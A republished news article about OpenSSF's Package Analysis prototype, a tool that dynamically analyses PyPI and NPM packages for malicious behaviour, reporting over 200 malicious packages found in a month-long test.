Home>Blog>The Hacker News Headlines>Here’s a New Tool That Scans Open-Source Repositories for Malicious Packages
The Hacker News Headlines

Here’s a New Tool That Scans Open-Source Repositories for Malicious Packages

Malicious Packages in Open-Source Repositories

The Open Source Security Foundation (OpenSSF) has announced the
initial prototype release of a new tool that’s capable of carrying
out dynamic analysis of all packages uploaded to popular open
source repositories.

Called the Package Analysis[1]
project, the initiative aims to secure open-source packages by
detecting and alerting users to any malicious behavior with the
goal of bolstering the security of the software supply chain and
increasing trust in open-source software.

CyberSecurity

“The Package Analysis project seeks to understand the behavior
and capabilities of packages available on open source repositories:
what files do they access, what addresses do they connect to, and
what commands do they run?,” the OpenSSF said[2].

“The project also tracks changes in how packages behave over
time, to identify when previously safe software begins acting
suspiciously,” the foundation’s Caleb Brown and David A. Wheeler
added.

In a test run that lasted a month, the tool identified more than
200 malicious packages[3]
uploaded to PyPI and NPM, with a majority of the rogue libraries
leveraging dependency confusion[4]
and typosquatting[5]
attacks.

Google, which is a member of OpenSSF, has also rallied its support[6]
behind the Package Analysis project, while emphasizing the need for
“vetting packages being published in order to keep users safe.”

CyberSecurity

The tech giant’s Open Source Security Team, last year, put forth
a new frame called Supply chain Levels for Software Artifacts
(SLSA[7]) to ensure the integrity
of software packages and prevent unauthorized modifications.

The development comes as the open source[8]
ecosystem[9]
is being increasingly[10] weaponized[11] to target developers
with a variety of malware, including cryptocurrency miners and
information stealers.

References

  1. ^
    Package
    Analysis     (github.com)
  2. ^
    said
    (openssf.org)
  3. ^
    200
    malicious packages     (github.com)
  4. ^
    dependency confusion
    (thehackernews.com)
  5. ^
    typosquatting
    (thehackernews.com)
  6. ^
    rallied
    its support     (security.googleblog.com)
  7. ^
    SLSA
    (thehackernews.com)
  8. ^
    open
    source     (thehackernews.com)
  9. ^
    ecosystem
    (thehackernews.com)
  10. ^
    increasingly
    (thehackernews.com)
  11. ^
    weaponized
    (thehackernews.com)

Read more

Leave a Reply

Powered By Anakyst UK Work done easy Discover Great Places People Websites in Nigeria. Be Discovered and Discover Great Places People Products & Websites in Nigeria. Tell us what you need to advertise online onradio ontv and where you want to advertise and discover talented publishers and advertisers within minutes for just a fraction of the cost!JobScout | Developed By Rara Theme. Powered by WordPress.